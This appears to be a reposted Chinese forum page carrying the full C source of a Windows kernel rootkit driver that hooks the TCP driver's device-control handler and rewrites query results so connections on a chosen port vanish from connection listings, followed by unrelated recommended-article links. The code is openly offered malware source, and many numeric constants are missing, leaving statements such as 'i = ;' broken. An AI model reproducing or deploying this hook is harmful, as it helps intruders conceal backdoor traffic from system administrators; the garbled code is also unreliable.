隐藏tcp端口,来自看雪

///////////////////////////////////////////////////////////////////////////////////////

// Filename Rootkit.c

//

// Author: Jamie Butler

// Email:  james.butler@hbgary.com or butlerjr@acm.org

//

// Description: This is where the work gets done.

//

// Version: 1.0

// 

#include "ntddk.h"

#include "tdiinfo.h"

//#include "stdio.h"

//#include "stdlib.h"

#include "Rootkit.h"

NTSTATUS DriverEntry(

                   IN PDRIVER_OBJECT  DriverObject,

                   IN PUNICODE_STRING RegistryPath

                    )

{

    NTSTATUS                ntStatus;

    OldIrpMjDeviceControl = NULL;

    DriverObject->DriverUnload = RootkitUnload;

    ntStatus = InstallTCPDriverHook();

    if(!NT_SUCCESS(ntStatus))

        return ntStatus;

    return STATUS_SUCCESS;

}

NTSTATUS InstallTCPDriverHook()

{

    NTSTATUS       ntStatus;

//  UNICODE_STRING deviceNameUnicodeString;

//  UNICODE_STRING deviceLinkUnicodeString;

    UNICODE_STRING deviceTCPUnicodeString;

    WCHAR deviceTCPNameBuffer[]  = L"\\Device\\Tcp";

    pFile_tcp  = NULL;

    pDev_tcp   = NULL;

    pDrv_tcpip = NULL;

    RtlInitUnicodeString (&deviceTCPUnicodeString, deviceTCPNameBuffer);

    ntStatus = IoGetDeviceObjectPointer(&deviceTCPUnicodeString, FILE_READ_DATA, &pFile_tcp, &pDev_tcp);

    if(!NT_SUCCESS(ntStatus))

    {

        DbgPrint("读取失败!");

        return ntStatus;

    }

    DbgPrint("读取成功!");

    pDrv_tcpip = pDev_tcp->DriverObject;

    OldIrpMjDeviceControl = pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL];

    if (OldIrpMjDeviceControl)

        InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)HookedDeviceControl);

    return STATUS_SUCCESS;

}

NTSTATUS HookedDeviceControl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)

{

    PIO_STACK_LOCATION      irpStack;

    ULONG                   ioTransferType;

    TDIObjectID             *inputBuffer;

    DWORD                    context;

    //DbgPrint("The current IRP is at %x\n", Irp);

    // Get a pointer to the current location in the Irp. This is where

    // the function codes and parameters are located.

    irpStack = IoGetCurrentIrpStackLocation (Irp);

    switch (irpStack->MajorFunction)

    {

        case IRP_MJ_DEVICE_CONTROL:

            if ((irpStack->MinorFunction == ) && \

                (irpStack->Parameters.DeviceIoControl.IoControlCode == IOCTL_TCP_QUERY_INFORMATION_EX))

            {

                ioTransferType = irpStack->Parameters.DeviceIoControl.IoControlCode;

                ioTransferType &= ;

                if (ioTransferType == METHOD_NEITHER) // Need to know the method to find input buffer

                {

                    inputBuffer = (TDIObjectID *) irpStack->Parameters.DeviceIoControl.Type3InputBuffer;

                    // CO_TL_ENTITY is for TCP and CL_TL_ENTITY is for UDP

                    if (inputBuffer->toi_entity.tei_entity == CO_TL_ENTITY)

                    {

                        DbgPrint("Input buffer %x\n",inputBuffer);

                        if ((inputBuffer->toi_id == 0x101) || (inputBuffer->toi_id == 0x102) || (inputBuffer->toi_id == 0x110))

                        {

                            // Call our completion routine if IRP successful

                            irpStack->Control = ;

                            irpStack->Control |= SL_INVOKE_ON_SUCCESS; 

                            // Save old completion routine if present

                            irpStack->Context = (PIO_COMPLETION_ROUTINE) ExAllocatePool(NonPagedPool, sizeof(REQINFO));

                            ((PREQINFO)irpStack->Context)->OldCompletion = irpStack->CompletionRoutine;

                            ((PREQINFO)irpStack->Context)->ReqType       = inputBuffer->toi_id;

                            // Setup our function to be called on completion of IRP

                            irpStack->CompletionRoutine = (PIO_COMPLETION_ROUTINE)IoCompletionRoutine;

                        }

                    }

                }

            }

        break;

        default:

        break;

    }

    return OldIrpMjDeviceControl(DeviceObject, Irp);

}

NTSTATUS IoCompletionRoutine(IN PDEVICE_OBJECT DeviceObject,

                             IN PIRP Irp,

                             IN PVOID Context)

{

    PVOID OutputBuffer;

    DWORD NumOutputBuffers;

    PIO_COMPLETION_ROUTINE p_compRoutine;

    DWORD i;

    // Connection status values:

    // 0 = Invisible

    // 1 = CLOSED

    // 2 = LISTENING

    // 3 = SYN_SENT

    // 4 = SYN_RECEIVED

    // 5 = ESTABLISHED

    // 6 = FIN_WAIT_1

    // 7 = FIN_WAIT_2

    // 8 = CLOSE_WAIT

    // 9 = CLOSING

    // ...

    OutputBuffer = Irp->UserBuffer;

    p_compRoutine = ((PREQINFO)Context)->OldCompletion;

    if (((PREQINFO)Context)->ReqType == 0x101)

    {

        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO101);

        for(i = ; i < NumOutputBuffers; i++)

        {

            // Hide all Web connections

            if (HTONS(((PCONNINFO101)OutputBuffer)[i].src_port) == )

                ((PCONNINFO101)OutputBuffer)[i].status = ;

        }

    }

    else if (((PREQINFO)Context)->ReqType == 0x102)

    {

        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO102);

        for(i = ; i < NumOutputBuffers; i++)

        {

            // Hide all Web connections

            if (HTONS(((PCONNINFO102)OutputBuffer)[i].src_port) == )

                ((PCONNINFO102)OutputBuffer)[i].status = ;

        }

    }

    else if (((PREQINFO)Context)->ReqType == 0x110)

    {

        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO110);

        for(i = ; i < NumOutputBuffers; i++)

        {

            // Hide all Web connections

            if (HTONS(((PCONNINFO110)OutputBuffer)[i].src_port) == )

                ((PCONNINFO110)OutputBuffer)[i].status = ;

        }

    }

    ExFreePool(Context);

    /*

    for(i = 0; i < NumOutputBuffers; i++)

    {

        DbgPrint("Status: %d",OutputBuffer[i].status);

        DbgPrint(" %d.%d.%d.%d:%d",OutputBuffer[i].src_addr & 0xff,OutputBuffer[i].src_addr >> 8 & 0xff, OutputBuffer[i].src_addr >> 16 & 0xff,OutputBuffer[i].src_addr >> 24,HTONS(OutputBuffer[i].src_port));

        DbgPrint(" %d.%d.%d.%d:%d\n",OutputBuffer[i].dst_addr & 0xff,OutputBuffer[i].dst_addr >> 8 & 0xff, OutputBuffer[i].dst_addr >> 16 & 0xff,OutputBuffer[i].dst_addr >> 24,HTONS(OutputBuffer[i].dst_port));

    }*/

    if ((Irp->StackCount > (ULONG)) && (p_compRoutine != NULL))

    {

        return (p_compRoutine)(DeviceObject, Irp, NULL);

    }

    else

    {

        return Irp->IoStatus.Status;

    }

}

NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)

{

    if (OldIrpMjDeviceControl)

        InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)OldIrpMjDeviceControl);

    if (pFile_tcp != NULL)

        ObDereferenceObject(pFile_tcp);

    pFile_tcp = NULL;

    return STATUS_SUCCESS;

}

HideTcpip.c的更多相关文章

随机推荐

  1. java8学习之Predicate深入剖析与函数式编程本质

    上次[http://www.cnblogs.com/webor2006/p/8214596.html]对Predicate函数接口进行了初步的学习,其中提到了在未来要学习的Stream中得到了大量的应 ...

  2. java8学习之BiFunction函数式接口实例演示&Predicate函数式接口详解

    BiFunction函数式接口: 在上次中已经对BiFunction接口进行了初步的认识,这里对它进一步学习,这里打算新建一个Person实体,然后新建若干个Person的实例存放在集合中,最后再根据 ...

  3. 你还不知道这款VCL界面开发工具?DevExpress VCL v19.1.6来袭

    DevExpress VCL Controls是 Devexpress公司旗下最老牌的用户界面套包.所包含的控件有:数据录入,图表,数据分析,导航,布局,网格,日程管理,样式,打印和工作流等,让您快速 ...

  4. python脚本攻略之log日志

    1 logging模块简介 logging模块是Python内置的标准模块,主要用于输出运行日志,可以设置输出日志的等级.日志保存路径.日志文件回滚等:相比print,具备如下优点: 可以通过设置不同 ...

  5. vueCli和脚手架

    vue CLI相当于一个基于vue开发的框架:可以用来快速开发vue项目:   1.安装 由于需要用到npm命令,所以要先安装node.js:     node.js下载地址:https://node ...

  6. Java进阶知识05 Hibernate联合主键之Annotation(注解)和XML实现方式

    1.Hibernate联合主键(Annotation实现) 1.1.单列主键 1.1.1.为什么要有主键? //唯一确定一条记录    1.1.2.一个表能否有多个主键? //不能    1.1.3. ...

  7. Spring Batch 4.2 新特性

    Spring Batch 4.2 的发行版主要增强了下面的改进: 使用 Micrometer 来支持批量指标(batch metrics) 支持从 Apache Kafka topics 读取/写入( ...

  8. P1914 小书童——密码

    输入格式: 第一行:n.第二行:未移动前的一串字母 输出格式: 一行,是此蒟蒻的密码 直接上代码: #include<iostream> using namespace std; int ...

  9. JavaWeb-SpringSecurity初认识

    Spring Security 安全 百度百科 功能:Spring Security对Web安全性的支持大量地依赖于Servlet过滤器.这些过滤器拦截进入请求,并且在应用程序处理该请求之前进行某些安 ...

  10. Java中的基本数据类型和引用类型

    一.基本数据类型: byte:Java中最小的数据类型,在内存中占8位(bit),即1个字节,取值范围-128~127,默认值0 short:短整型,在内存中占16位,即2个字节,取值范围-32768 ...